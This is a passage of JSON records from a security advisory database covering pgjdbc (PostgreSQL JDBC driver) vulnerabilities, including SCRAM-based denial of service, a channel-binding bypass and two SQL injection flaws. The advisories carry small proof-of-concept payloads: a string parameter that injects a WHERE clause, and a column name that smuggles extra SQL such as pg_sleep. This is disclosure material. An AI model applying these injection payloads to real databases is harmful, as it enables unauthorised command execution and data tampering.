authentication can fail.\nA single attempt ties up a CPU core. Repeated or concurrent attempts exhaust client CPU and can wedge connection pools.\n\nIn affected versions, `loginTimeout` did not fully mitigate this problem. When `loginTimeout` expired, the caller could stop waiting, but the worker thread performing the connection attempt could continue running and burning CPU inside the SCRAM PBKDF2 computation.\n\nThis issue affects availability. It does **not** provide authentication bypass, privilege escalation, or direct password disclosure.\n\nA user is vulnerable when **all** of the following are true:\n\n1. The connection uses **SCRAM-SHA-256** authentication.\n2. The client reaches a **malicious, compromised, or attacker-controlled PostgreSQL endpoint**.\n3. That endpoint sends a very large SCRAM PBKDF2 iteration count in the `server-first-message`.\n\nIn practice, that can happen in these situations:\n\n- the application lets end users or tenants supply their own database connection details (as in many BI, reporting, analytics, ETL, and low-code platforms), so a user can point the shared client host at a server they control\n- the application accepts connection strings, hostnames, or JDBC URLs from user input, configuration uploaded by users, or other untrusted sources\n- the application is configured to connect to a PostgreSQL server that is itself malicious or later becomes compromised\n- the application connects through an untrusted proxy, relay, tunnel, bastion, or connection-pooling service that can act as the PostgreSQL server\n- an attacker can redirect the client to a fake PostgreSQL endpoint by manipulating DNS, service discovery, Kubernetes service resolution, `/etc/hosts`, environment variables, or similar indirection\n- an active network attacker on the path can impersonate the server because the connection does not strongly verify server identity (for example, `sslmode` lower than `verify-full`, or trusting a CA that signs hosts outside the operator's control)\n\nThe issue is **more damaging** when the application uses connection retries, many parallel connection attempts, or `loginTimeout` and assumes the timeout fully stops the work.\n\n### Patches\nThe patch introduces a new connection property, `scramMaxIterations`, with a default of 100K. The client now rejects SCRAM server messages that advertise more PBKDF2 iterations than the configured cap before starting the PBKDF2 computation begins.\n\n### Workarounds\n\nUntil a patched version of pgjdbc is deployed, the following measures reduce exposure:\n\n1. **Only connect to trusted PostgreSQL servers whose identity is verified.**  \n   Connect only to trusted PostgreSQL servers, and verify server identity with TLS using sslmode=verify-full and a trusted CA.\n   TLS without certificate and hostname verification is not sufficient as an active network attacker can still impersonate the server.\n\n2. **Do not rely on `loginTimeout` as a complete mitigation on unpatched versions.**  \n   On affected versions, `loginTimeout` can stop the waiting caller while the worker thread continues spending CPU.\n\n3. **Avoid SCRAM on untrusted or interceptable connection paths.**  \n   For those paths, use an authentication method that does not let the server choose a SCRAM PBKDF2 iteration count.\n\n4. **Reduce blast radius operationally.**  \n   Limit parallel connection attempts, add retry backoff, isolate connection establishment in a separate worker or process when possible, and apply CPU or container limits where appropriate.\n\n5. **On trusted servers you control, keep SCRAM iteration counts at ordinary values.**  \n   This does not defend against an attacker-controlled server, but it avoids unnecessary client cost when talking to legitimate servers.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-05T20:09:36.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-98qh-xjc8-98pq","https://nvd.nist.gov/vuln/detail/CVE-2026-42198","https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.11","https://github.com/advisories/GHSA-98qh-xjc8-98pq"],"source_kind":"github","identifiers":["GHSA-98qh-xjc8-98pq","CVE-2026-42198"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-05T21:00:09.283Z","updated_at":"2026-06-14T01:00:49.675Z","epss_percentage":0.00043,"epss_percentile":0.13612,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05OHFoLXhqYzgtOThwcc4ABWM0","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05OHFoLXhqYzgtOThwcc4ABWM0","packages":[{"ecosystem":"maven","package_name":"org.postgresql:postgresql","versions":[{"first_patched_version":"42.7.11","vulnerable_version_range":"\u003e= 42.2.0, \u003c 42.7.11"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05OHFoLXhqYzgtOThwcc4ABWM0/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1ocTlwLXBtN3ctOHA1NM4ABI-2","url":"https://github.com/advisories/GHSA-hq9p-pm7w-8p54","title":"pgjdbc Client Allows Fallback to Insecure Authentication Despite channelBinding=require Configuration","description":"### Impact\nWhen the PostgreSQL JDBC driver is configured with channel binding set to `required` (default value is `prefer`), the driver would incorrectly allow connections to proceed with authentication methods that do not support channel binding (such as password, MD5, GSS, or SSPI  authentication). This could allow a man-in-the-middle attacker to intercept connections that users believed were protected by channel binding requirements.\n\n### Patches\nTBD\n\n### Workarounds\n\nConfigure `sslMode=verify-full` to prevent MITM attacks.\n\n### References\n\n* https://www.postgresql.org/docs/current/sasl-authentication.html#SASL-SCRAM-SHA-256\n* https://datatracker.ietf.org/doc/html/rfc7677\n* https://datatracker.ietf.org/doc/html/rfc5802","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-06-11T14:44:04.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.2,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N","references":["https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-hq9p-pm7w-8p54","https://github.com/pgjdbc/pgjdbc/commit/9217ed16cb2918ab1b6b9258ae97e6ede244d8a0","https://datatracker.ietf.org/doc/html/rfc5802","https://datatracker.ietf.org/doc/html/rfc7677","https://www.postgresql.org/docs/current/sasl-authentication.html#SASL-SCRAM-SHA-256","https://nvd.nist.gov/vuln/detail/CVE-2025-49146","https://github.com/advisories/GHSA-hq9p-pm7w-8p54"],"source_kind":"github","identifiers":["GHSA-hq9p-pm7w-8p54","CVE-2025-49146"],"repository_url":"https://github.com/pgjdbc/pgjdbc","blast_radius":0.0,"created_at":"2025-06-11T15:08:39.482Z","updated_at":"2026-05-24T07:03:52.349Z","epss_percentage":0.0004,"epss_percentile":0.12155,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ocTlwLXBtN3ctOHA1NM4ABI-2","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1ocTlwLXBtN3ctOHA1NM4ABI-2","packages":[{"ecosystem":"maven","package_name":"org.postgresql:postgresql","versions":[{"first_patched_version":"42.7.7","vulnerable_version_range":"\u003e= 42.7.4, \u003c 42.7.7"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ocTlwLXBtN3ctOHA1NM4ABI-2/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0yNHJwLXEzdzYtdmM1Ns4AA5cA","url":"https://github.com/advisories/GHSA-24rp-q3w6-vc56","title":"org.postgresql:postgresql vulnerable to SQL Injection via line comment generation","description":"# Impact\nSQL injection is possible when using the non-default connection property `preferQueryMode=simple` in combination with application code that has a vulnerable SQL that negates a parameter value.\n\nThere is no vulnerability in the driver when using the default query mode. Users that do not override the query mode are not impacted.\n\n# Exploitation\n\nTo exploit this behavior the following conditions must be met:\n\n1. A placeholder for a numeric value must be immediately preceded by a minus (i.e. `-`)\n1. There must be a second placeholder for a string value after the first placeholder on the same line. \n1. Both parameters must be user controlled.\n\nThe prior behavior of the driver when operating in simple query mode would inline the negative value of the first parameter and cause the resulting line to be treated as a `--` SQL comment. That would extend to the beginning of the next parameter and cause the quoting of that parameter to be consumed by the comment line. If that string parameter includes a newline, the resulting text would appear unescaped in the resulting SQL.\n\nWhen operating in the default extended query mode this would not be an issue as the parameter values are sent separately to the server. Only in simple query mode the parameter values are inlined into the executed SQL causing this issue.\n\n# Example\n\n```java\nPreparedStatement stmt = conn.prepareStatement(\"SELECT -?, ?\");\nstmt.setInt(1, -1);\nstmt.setString(2, \"\\nWHERE false --\");\nResultSet rs = stmt.executeQuery();\n```\n\nThe resulting SQL when operating in simple query mode would be:\n\n```sql\nSELECT --1,'\nWHERE false --'\n```\n\nThe contents of the second parameter get injected into the command. Note how both the number of result columns and the WHERE clause of the command have changed. A more elaborate example could execute arbitrary other SQL commands.\n\n# Patch\nProblem will be patched upgrade to 42.7.2, 42.6.1, 42.5.5, 42.4.4, 42.3.9, 42.2.28, 42.2.28.jre7\n\nThe patch fixes the inlining of parameters by forcing them all to be serialized as wrapped literals. The SQL in the prior example would be transformed into:\n\n```sql\nSELECT -('-1'::int4), ('\nWHERE false --')\n```\n\n# Workarounds\nDo not use the connection property`preferQueryMode=simple`. (*NOTE: If you do not explicitly specify a query mode then you are using the default of `extended` and are not impacted by this issue.*)","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2024-02-21T23:33:43.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":10.0,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H","references":["https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-24rp-q3w6-vc56","https://nvd.nist.gov/vuln/detail/CVE-2024-1597","https://github.com/pgjdbc/pgjdbc/commit/06abfb78a627277a580d4df825f210e96a4e14ee","https://github.com/pgjdbc/pgjdbc/commit/93b0fcb2711d9c1e3a2a03134369738a02a58b40","https://github.com/advisories/GHSA-24rp-q3w6-vc56"],"source_kind":"github","identifiers":["GHSA-24rp-q3w6-vc56","CVE-2024-1597"],"repository_url":"https://github.com/pgjdbc/pgjdbc","blast_radius":0.0,"created_at":"2024-02-22T00:04:46.731Z","updated_at":"2026-06-19T07:06:50.391Z","epss_percentage":0.0035,"epss_percentile":0.57602,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yNHJwLXEzdzYtdmM1Ns4AA5cA","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0yNHJwLXEzdzYtdmM1Ns4AA5cA","packages":[{"ecosystem":"maven","package_name":"org.postgresql:postgresql","versions":[{"first_patched_version":"42.7.2","vulnerable_version_range":"\u003e= 42.7.0, \u003c 42.7.2"},{"first_patched_version":"42.6.1","vulnerable_version_range":"\u003e= 42.6.0, \u003c 42.6.1"},{"first_patched_version":"42.5.5","vulnerable_version_range":"\u003e= 42.5.0, \u003c 42.5.5"},{"first_patched_version":"42.4.4","vulnerable_version_range":"\u003e= 42.4.0, \u003c 42.4.4"},{"first_patched_version":"42.3.9","vulnerable_version_range":"\u003e= 42.3.0, \u003c 42.3.9"},{"first_patched_version":"42.2.28","vulnerable_version_range":"\u003c 42.2.28"}],"purl":null,"statistics":{"dependent_packages_count":3652,"dependent_repos_count":176054,"downloads":null,"downloads_period":null},"affected_versions":["9.4.1207","9.4.1207.jre6","9.4.1207.jre7","9.4.1208","9.4.1208.jre6","9.4.1208.jre7","9.4.1209","9.4.1209.jre6","9.4.1209.jre7","9.4.1210","9.4.1210.jre6","9.4.1210.jre7","9.4.1211","9.4.1211.jre6","9.4.1211.jre7","9.4.1212","9.4.1212.jre6","9.4.1212.jre7","42.0.0","42.0.0.jre6","42.0.0.jre7","42.1.0","42.1.0.jre7","42.1.1","42.1.1.jre6","42.1.1.jre7","42.1.2","42.1.2.jre6","42.1.2.jre7","42.1.3","42.1.3.jre6","42.1.3.jre7","42.1.4","42.1.4.jre6","42.1.4.jre7","42.2.0","42.2.0.jre6","42.2.0.jre7","42.2.1","42.2.1.jre6","42.2.1.jre7","42.2.2","42.2.2.jre6","42.2.2.jre7","42.2.3","42.2.3.jre6","42.2.3.jre7","42.2.4","42.2.4.jre6","42.2.4.jre7","42.2.5","42.2.5.jre6","42.2.5.jre7","42.2.6","42.2.6.jre6","42.2.6.jre7","42.2.7","42.2.7.jre6","42.2.7.jre7","42.2.8","42.2.8.jre6","42.2.8.jre7","42.2.9","42.2.9.jre6","42.2.9.jre7","42.2.10","42.2.10.jre6","42.2.10.jre7","42.2.11","42.2.11.jre6","42.2.11.jre7","42.2.12","42.2.12.jre6","42.2.12.jre7","42.2.13","42.2.13.jre6","42.2.13.jre7","42.2.14","42.2.14.jre6","42.2.14.jre7","42.2.15","42.2.15.jre6","42.2.15.jre7","42.2.16","42.2.16.jre6","42.2.16.jre7","42.2.17","42.2.17.jre6","42.2.17.jre7","42.2.18","42.2.18.jre6","42.2.18.jre7","42.2.19","42.2.19.jre6","42.2.19.jre7","42.2.20","42.2.20.jre6","42.2.20.jre7","42.2.21","42.2.21.jre6","42.2.21.jre7","42.2.22","42.2.22.jre6","42.2.22.jre7","42.2.23","42.2.23.jre6","42.2.23.jre7","42.2.24","42.2.24.jre6","42.2.24.jre7","42.2.25","42.2.25.jre6","42.2.25.jre7","42.2.26","42.2.26.jre6","42.2.26.jre7","42.2.27","42.2.27.jre6","42.2.27.jre7","42.3.0","42.3.1","42.3.2","42.3.3","42.3.4","42.3.5","42.3.6","42.3.7","42.3.8","42.4.0","42.4.1","42.4.2","42.4.3","42.5.0","42.5.1","42.5.2","42.5.3","42.5.4","42.6.0","42.7.0","42.7.1"],"unaffected_versions":["42.2.28","42.2.28.jre7","42.2.29","42.3.9","42.3.10","42.4.4","42.4.5","42.5.5","42.5.6","42.6.1","42.6.2","42.7.2","42.7.3","42.7.4","42.7.5","42.7.6","42.7.7","42.7.8","42.7.9","42.7.10","42.7.11"]}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yNHJwLXEzdzYtdmM1Ns4AA5cA/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14Zmc2LTYycHgtY3hjMs4AA5Xt","url":"https://github.com/advisories/GHSA-xfg6-62px-cxc2","title":"Duplicate Advisory: SQL injection in pgjdbc","description":"## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-24rp-q3w6-vc56. This link is maintained to preserve external references.\n\n## Original Description\npgjdbc, the PostgreSQL JDBC Driver, allows attacker to inject SQL if using PreferQueryMode=SIMPLE. Note this is not the default. In the default mode there is no vulnerability. A placeholder for a numeric value must be immediately preceded by a minus. There must be a second placeholder for a string value after the first placeholder; both must be on the same line. By constructing a matching string payload, the attacker can inject SQL to alter the query,bypassing the protections that parameterized queries bring against SQL Injection attacks. Versions before 42.7.2, 42.6.1, 42.5.5, 42.4.4, 42.3.9, and 42.2.8 are affected.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2024-02-19T15:30:38.000Z","withdrawn_at":"2024-02-21T23:18:25.000Z","classification":"GENERAL","cvss_score":10.0,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H","references":["https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-24rp-q3w6-vc56","https://nvd.nist.gov/vuln/detail/CVE-2024-1597","https://github.com/pgjdbc/pgjdbc/commit/06abfb78a627277a580d4df825f210e96a4e14ee","https://github.com/pgjdbc/pgjdbc/commit/93b0fcb2711d9c1e3a2a03134369738a02a58b40","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TZQTSMESZD2RJ5XBPSXH3TIQVUW5DIUU","https://security.netapp.com/advisory/ntap-20240419-0008","https://www.enterprisedb.com/docs/jdbc_connector/latest/01_jdbc_rel_notes","https://www.enterprisedb.com/docs/security/assessments/cve-2024-1597","http://www.openwall.com/lists/oss-security/2024/04/02/6","https://lists.debian.org/debian-lts-announce/2024/05/msg00007.html","https://github.com/advisories/GHSA-xfg6-62px-cxc2"],"source_kind":"github","identifiers":["GHSA-xfg6-62px-cxc2"],"repository_url":"https://github.com/pgjdbc/pgjdbc","blast_radius":0.0,"created_at":"2024-02-21T01:04:30.219Z","updated_at":"2026-06-14T01:06:03.795Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14Zmc2LTYycHgtY3hjMs4AA5Xt","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14Zmc2LTYycHgtY3hjMs4AA5Xt","packages":[{"ecosystem":"maven","package_name":"org.postgresql:postgresql","versions":[{"first_patched_version":"42.2.8","vulnerable_version_range":"\u003c 42.2.8"},{"first_patched_version":"42.3.9","vulnerable_version_range":"\u003e= 42.3.0, \u003c 42.3.9"},{"first_patched_version":"42.4.4","vulnerable_version_range":"\u003e= 42.4.0, \u003c 42.4.4"},{"first_patched_version":"42.5.5","vulnerable_version_range":"\u003e= 42.5.0, \u003c 42.5.5"},{"first_patched_version":"42.6.1","vulnerable_version_range":"\u003e= 42.6.0, \u003c 42.6.1"},{"first_patched_version":"42.7.2","vulnerable_version_range":"\u003e= 42.7.0, \u003c 42.7.2"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14Zmc2LTYycHgtY3hjMs4AA5Xt/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01NjJyLXZnMzMtOHg4aM4AAwB_","url":"https://github.com/advisories/GHSA-562r-vg33-8x8h","title":"TemporaryFolder on unix-like systems does not limit access to created files","description":"**Vulnerability**\n\n`PreparedStatement.setText(int, InputStream)`\nand\n\n`PreparedStatemet.setBytea(int, InputStream)`\n\nwill create a temporary file if the InputStream is larger than 51k\n\n \nExample of vulnerable code:\n\n```java\nString s = \"some very large string greater than 51200 bytes\";\n\nPreparedStatement.setInputStream(1, new ByteArrayInputStream(s.getBytes()) );\n```\nThis will create a temporary file which is readable by other users on Unix like systems, but not MacOS.\n\nImpact\nOn Unix like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system.\n\nThis vulnerability does not allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability.\n\nWhen analyzing the impact of this vulnerability, here are the important questions to ask:\n\nIs the driver running in an environment where the OS has other untrusted users.\nIf yes, and you answered 'yes' to question 1, this vulnerability impacts you.\nIf no, this vulnerability does not impact you.\nPatches\nBecause certain JDK file system APIs were only added in JDK 1.7, this this fix is dependent upon the version of the JDK you are using.\n\nJava 1.8 and higher users: this vulnerability is fixed in 42.2.27, 42.3.8, 42.4.3, 42.5.1\nJava 1.7 users: this vulnerability is fixed in 42.2.27.jre7\nJava 1.6 and lower users: no patch is available; you must use the workaround below.\nWorkarounds\nIf you are unable to patch, or are stuck running on Java 1.6, specifying the java.io.tmpdir system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability.\n\nReferences\n[CWE-200: Exposure of Sensitive Information to an Unauthorized Actor](https://cwe.mitre.org/data/definitions/200.html)\nFix commit https://github.com/pgjdbc/pgjdbc/commit/9008dc9aade6dbfe4efafcd6872ebc55f4699cf5\nSimilar Vulnerabilities\nGoogle Guava - https://github.com/google/guava/issues/4011\nApache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945\nJetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-11-23T22:17:25.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.7,"cvss_vector":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N","references":["https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-562r-vg33-8x8h","https://nvd.nist.gov/vuln/detail/CVE-2022-41946","https://github.com/pgjdbc/pgjdbc/commit/9008dc9aade6dbfe4efafcd6872ebc55f4699cf5","https://lists.debian.org/debian-lts-announce/2022/12/msg00003.html","https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/25TY2L3RMVNOC7VAHJEAO7PTT6M6JJAD","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/25TY2L3RMVNOC7VAHJEAO7PTT6M6JJAD","https://security.netapp.com/advisory/ntap-20240329-0003","https://lists.debian.org/debian-lts-announce/2024/12/msg00017.html","https://github.com/advisories/GHSA-562r-vg33-8x8h"],"source_kind":"github","identifiers":["GHSA-562r-vg33-8x8h","CVE-2022-41946"],"repository_url":"https://github.com/pgjdbc/pgjdbc","blast_radius":0.0,"created_at":"2022-12-21T16:11:45.832Z","updated_at":"2026-06-19T07:09:52.334Z","epss_percentage":0.00082,"epss_percentile":0.24005,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01NjJyLXZnMzMtOHg4aM4AAwB_","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01NjJyLXZnMzMtOHg4aM4AAwB_","packages":[{"ecosystem":"maven","package_name":"org.postgresql:postgresql","versions":[{"first_patched_version":"42.5.1","vulnerable_version_range":"\u003e= 42.5.0, \u003c 42.5.1"},{"first_patched_version":"42.4.3","vulnerable_version_range":"\u003e= 42.4.0, \u003c 42.4.3"},{"first_patched_version":"42.2.27","vulnerable_version_range":"\u003e= 42.2.0, \u003c 42.2.27"}],"purl":null,"statistics":{"dependent_packages_count":3652,"dependent_repos_count":176054,"downloads":null,"downloads_period":null},"affected_versions":["42.2.0","42.2.0.jre6","42.2.0.jre7","42.2.1","42.2.1.jre6","42.2.1.jre7","42.2.2","42.2.2.jre6","42.2.2.jre7","42.2.3","42.2.3.jre6","42.2.3.jre7","42.2.4","42.2.4.jre6","42.2.4.jre7","42.2.5","42.2.5.jre6","42.2.5.jre7","42.2.6","42.2.6.jre6","42.2.6.jre7","42.2.7","42.2.7.jre6","42.2.7.jre7","42.2.8","42.2.8.jre6","42.2.8.jre7","42.2.9","42.2.9.jre6","42.2.9.jre7","42.2.10","42.2.10.jre6","42.2.10.jre7","42.2.11","42.2.11.jre6","42.2.11.jre7","42.2.12","42.2.12.jre6","42.2.12.jre7","42.2.13","42.2.13.jre6","42.2.13.jre7","42.2.14","42.2.14.jre6","42.2.14.jre7","42.2.15","42.2.15.jre6","42.2.15.jre7","42.2.16","42.2.16.jre6","42.2.16.jre7","42.2.17","42.2.17.jre6","42.2.17.jre7","42.2.18","42.2.18.jre6","42.2.18.jre7","42.2.19","42.2.19.jre6","42.2.19.jre7","42.2.20","42.2.20.jre6","42.2.20.jre7","42.2.21","42.2.21.jre6","42.2.21.jre7","42.2.22","42.2.22.jre6","42.2.22.jre7","42.2.23","42.2.23.jre6","42.2.23.jre7","42.2.24","42.2.24.jre6","42.2.24.jre7","42.2.25","42.2.25.jre6","42.2.25.jre7","42.2.26","42.2.26.jre6","42.2.26.jre7","42.4.0","42.4.1","42.4.2","42.5.0"],"unaffected_versions":["9.4.1207","9.4.1207.jre6","9.4.1207.jre7","9.4.1208","9.4.1208.jre6","9.4.1208.jre7","9.4.1209","9.4.1209.jre6","9.4.1209.jre7","9.4.1210","9.4.1210.jre6","9.4.1210.jre7","9.4.1211","9.4.1211.jre6","9.4.1211.jre7","9.4.1212","9.4.1212.jre6","9.4.1212.jre7","42.0.0","42.0.0.jre6","42.0.0.jre7","42.1.0","42.1.0.jre7","42.1.1","42.1.1.jre6","42.1.1.jre7","42.1.2","42.1.2.jre6","42.1.2.jre7","42.1.3","42.1.3.jre6","42.1.3.jre7","42.1.4","42.1.4.jre6","42.1.4.jre7","42.2.27","42.2.27.jre6","42.2.27.jre7","42.2.28","42.2.28.jre7","42.2.29","42.3.0","42.3.1","42.3.2","42.3.3","42.3.4","42.3.5","42.3.6","42.3.7","42.3.8","42.3.9","42.3.10","42.4.3","42.4.4","42.4.5","42.5.1","42.5.2","42.5.3","42.5.4","42.5.5","42.5.6","42.6.0","42.6.1","42.6.2","42.7.0","42.7.1","42.7.2","42.7.3","42.7.4","42.7.5","42.7.6","42.7.7","42.7.8","42.7.9","42.7.10","42.7.11"]}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01NjJyLXZnMzMtOHg4aM4AAwB_/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1yMzhmLWM0aDQtaHFxMs4AAt2m","url":"https://github.com/advisories/GHSA-r38f-c4h4-hqq2","title":"PostgreSQL JDBC Driver SQL Injection in ResultSet.refreshRow() with malicious column names","description":"### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nThe PGJDBC implementation of the `java.sql.ResultRow.refreshRow()` method is not performing escaping of column names so a malicious column name that contains a statement terminator, e.g. `;`, could lead to SQL injection. This could lead to executing additional SQL commands as the application's JDBC user.\n\nUser applications that do not invoke the `ResultSet.refreshRow()` method are not impacted.\n\nUser application that do invoke that method are impacted if the underlying database that they are querying via their JDBC application may be under the control of an attacker. The attack requires the attacker to trick the user into executing SQL against a table name who's column names would contain the malicious SQL and subsequently invoke the `refreshRow()` method on the ResultSet.\n\nFor example:\n\n```sql\nCREATE TABLE refresh_row_example (\n  id     int PRIMARY KEY,\n  \"1 FROM refresh_row_example; SELECT pg_sleep(10); SELECT * \" int\n);\n```\n\nThis example has a table with two columns. The name of the second column is crafted to contain a statement terminator followed by additional SQL. Invoking the `ResultSet.refreshRow()` on a ResultSet that queried this table, e.g. `SELECT * FROM refresh_row`, would cause the additional SQL commands such as the `SELECT pg_sleep(10)` invocation to be executed.\n\nAs the multi statement command would contain multiple results, it would not be possible for the attacker to get data directly out of this approach as the `ResultSet.refreshRow()` method would throw an exception. However, the attacker could execute any arbitrary SQL including inserting the data into another table that could then be read or any other DML / DDL statement.\n\nNote that the application's JDBC user and the schema owner need not be the same. A JDBC application that executes as a privileged user querying database schemas owned by potentially malicious less-privileged users would be vulnerable. In that situation it may be possible for the malicious user to craft a schema that causes the application to execute commands as the privileged user.\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\nYes, versions 42.2.26, 42.3.7, and 42.4.1 have been released with a fix.\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nCheck that you are not using the `ResultSet.refreshRow()` method.\n\nIf you are, ensure that the code that executes that method does not connect to a database that is controlled by an unauthenticated or malicious user. If your application only connects to its own database with a fixed schema with no DDL permissions, then you will not be affected by this vulnerability as it requires a maliciously crafted schema.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2022-08-06T05:51:38.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H","references":["https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-r38f-c4h4-hqq2","https://nvd.nist.gov/vuln/detail/CVE-2022-31197","https://github.com/pgjdbc/pgjdbc/commit/739e599d52ad80f8dcd6efedc6157859b1a9d637","https://lists.debian.org/debian-lts-announce/2022/10/msg00009.html","https://lists.debian.org/debian-lts-announce/2024/12/msg00017.html","https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I6WHUADTZBBQLVHO4YG4XCWDGWBT4LRP","https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UTFE6SV33P5YYU2GNTQZQKQRVR3GYE4S","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I6WHUADTZBBQLVHO4YG4XCWDGWBT4LRP","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UTFE6SV33P5YYU2GNTQZQKQRVR3GYE4S","https://github.com/advisories/GHSA-r38f-c4h4-hqq2"],"source_kind":"github","identifiers":["GHSA-r38f-c4h4-hqq2","CVE-2022-31197"],"repository_url":"https://github.com/pgjdbc/pgjdbc","blast_radius":0.0,"created_at":"2022-12-21T16:11:57.330Z","updated_at":"2026-06-19T07:10:06.254Z","epss_percentage":0.02462,"epss_percentile":0.85512,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yMzhmLWM0aDQtaHFxMs4AAt2m","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1yMzhmLWM0aDQtaHFxMs4AAt2m","packages":[{"ecosystem":"maven","package_name":"org.postgresql:postgresql","versions":[{"first_patched_version":"42.3.7","vulnerable_version_range":"\u003e= 42.3.0, \u003c 42.3.7"},{"first_patched_version":"42.4.1","vulnerable_version_range":"\u003e= 42.4.0, \u003c 42.4.1"},{"first_patched_version":"42.2.26","vulnerable_version_range":"\u003c 42.2.26"}],"purl":null,"statistics":{"dependent_packages_count":3652,"dependent_repos_count":176054,"downloads":null,"downloads_period":null},"affected_versions":["9.4.1207","9.4.1207.jre6","9.4.1207.jre7","9.4.1208","9.4.1208.jre6","9.4.1208.jre7","9.4.1209","9.4.1209.jre6","9.4.1209.jre7","9.4.1210","9.4.1210.jre6","9.4.1210.jre7","9.4.1211","9.4.1211.jre6","9.4.1211.jre7","9.4.1212","9.4.1212.jre6","9.4.1212.jre7","42.0.0","42.0.0.jre6","42.0.0.jre7","42.1.0","42.1.0.jre7","42.1.1","42.1.1.jre6","42.1.1.jre7","42.1.2","42.1.2.jre6","42.1.2.jre7","42.1.3","42.1.3.jre6","42.1.3.jre7","42.1.4","42.1.4.jre6","42.1.4.jre7","42.2.0","42.2.0.jre6","42.2.0.jre7","42.2.1","42.2.1.jre6","42.2.1.jre7","42.2.2","42.2.2.jre6","42.2.2.jre7","42.2.3","42.2.3.jre6","42.2.3.jre7","42.2.4","42.2.4.jre6","42.2.4.jre7","42.2.5","42.2.5.jre6","42.2.5.jre7","42.2.6","42.2.6.jre6","42.2.6.jre7","42.2.7","42.2.7.jre6","42.2.7.jre7","42.2.8","42.2.8.jre6","42.2.8.jre7","42.2.9","42.2.9.jre6","42.2.9.jre7","42.2.10","42.2.10.jre6","42.2.10.jre7","42.2.11","42.2.11.jre6","42.2.11.jre7","42.2.12","42.2.12.jre6","42.2.12.jre7","42.2.13","42.2.13.jre6","42.2.13.jre7","42.2.14","42.2.14.jre6","42.2.14.jre7","42.2.15","42.2.15.jre6","42.2.15.jre7","42.2.16","42.2.16.jre6","42.2.16.jre7","42.2.17","42.2.17.jre6","42.2.17.jre7","42.2.18","42.2.18.jre6","42.2.18.jre7","42.2.19","42.2.19.jre6","